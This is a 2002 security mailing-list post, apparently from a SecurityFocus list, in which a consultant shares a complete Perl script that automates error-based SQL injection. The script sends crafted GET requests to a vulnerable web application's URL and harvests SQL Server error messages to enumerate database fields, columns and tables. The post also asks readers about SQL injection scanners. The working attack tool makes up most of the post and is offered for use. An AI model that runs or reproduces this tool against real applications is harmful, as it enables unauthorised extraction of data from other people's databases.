Hi,
Attached is a simple Perl code that enumerates any field, column or
table from a SQL server. It works via GET request, but a simple
modification for POST should be trivial. The only prerequisite is
that you must provide the vulnerable app (its URL) and an initial
query.
Is anyone aware of any SQL injection scanner? I am planning to write
one (only if I have the time :), I'm actually an IDS jockey), but
would like to know wether an existing tool exist (free tools of course).
Cheers,
--mel
Security Consultant, Intrusion Detection System
SCAN Associates Sdn. Bhd.
#!/usr/bin/perl -w
# sql_enum.pl
# [EMAIL PROTECTED] 16/Apr/2002
# a simple script to automatically 'enumerates' sql database
# greetz: scanners and skripkiddiotz
use IO::Socket;
use Getopt::Std;
my $VERSION = "0.1";
my $request = "";
my $qry = "";
# target does not really do anything
sub usage {
print STDERR qq {
--$0 v$VERSION--
Usage: $0 -t <target> -f <file> -F <field_nam> [options] where options are:
-p = <proxy's IP>
-P = <proxy port>
-l = <log file - output result here>
-c = <continue from last query>
};
exit 255;
}
getopts("t:f:F:p:P:l:c", \%args);
if (!$args{t}) { die "No target specified\n"; }
if (!$args{f}) { die "No file specified\n"; }
if (!$args{F}) { die "No field name specified\n"; }
if ($args{p} && !$args{P}) { die "\nPlease specify the proxy port!\n"; }
if (!$args{p} && $args{P}) { die "\nNo proxy IP is specified!\n"; }
my $proxy_ip = "";
my $proxy_port = "";
if ($args{p} && $args{P}) {
my $pip = gethostbyname($args{p});
if (length($pip) <= 0) {
die "Can't resolve the proxy!\n";
} else {
$proxy_ip = $pip;
$proxy_port = $args{P};
}
} else {
$proxy_ip = $args{t};
$proxy_port = "80";
}
my $file = $args{f};
my $target = $args{t};
my $field = $args{F};
my $lfile = $args{l};
if (!defined($file)) { die "No file specified\n"; }
open(F, $file) or die "Can't open $file!\n";
if ($args{l}) { open(LOGFILE, ">>$lfile") or die "Can't create file\n"; }
# no support for multiple targets yet
while (my $line = <F>) { chomp $line; $qry = $line; }
close(F);
sub send_query
{
my $result = "";
my $data = "";
my $blu = "";
my $request = shift @_;
select (STDOUT); $|=1;
socket(S,PF_INET,SOCK_STREAM, getprotobyname('tcp') || 0) or die "Socket\n";
select (S); $|=1;
select (STDOUT);
if (connect(S,pack "SnA4x8",2,$proxy_port,$proxy_ip)) {
print S $request;
sleep 1;
shutdown S, 1;
while(my $bla = <S>) {
$data .= $bla;
}
if ($data =~ /Syntax error/) {
$blu = $data;
if ($blu =~ /value\s+(\'\S*\')\s+to/) {
$result = $1;
} else {
print "Error: $blu\n\n";
$result = "31337";
}
} else {
print LOGFILE "Last request sent was:\n\n";
print LOGFILE "$request\n\n";
print LOGFILE "The enumerator encoutered the ";
print LOGFILE "error\n\n";
print LOGFILE $data;
die ("An error occured\n");
close(S);
}
} else {
die "connection problems\n";
close(S);
}
close(S);
return $result;
}
$request =
"GET $qry-- HTTP/1.1\r\n".
"Host: $target\r\n".
"Accept: */*\r\n".
"\r\n";
if (!$args{c}) {
my $new_qry = "%20AND%20$field%20NOT%20IN%20(";
$qry .= $new_qry;
}
print "Sending first query: $request\n\n";
my $i = 0;
my $res = "";
while (($res = send_query($request)) ne "31337") {
$i++;
$qry .= "$res";
print LOGFILE "[$i] $res\n";
print "[$i] $res\n";
# quick and easy way to make sure the query is valid
if ($qry =~ /convert/ or $qry =~ /CONVERT/) {
$qry =~ s/\)\)//;
$qry .= ")))";
} else {
$qry .= ")";
}
#}
$qry =~ s/\'\)\'/\'\,\'/;
print "Sending query $i: $qry\n\n";
$request =
"GET $qry-- HTTP/1.1\r\n" .
"Host: $target\r\n" .
"Accept: */*\r\n" .
"\r\n";
$res = send_query($request);
}
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
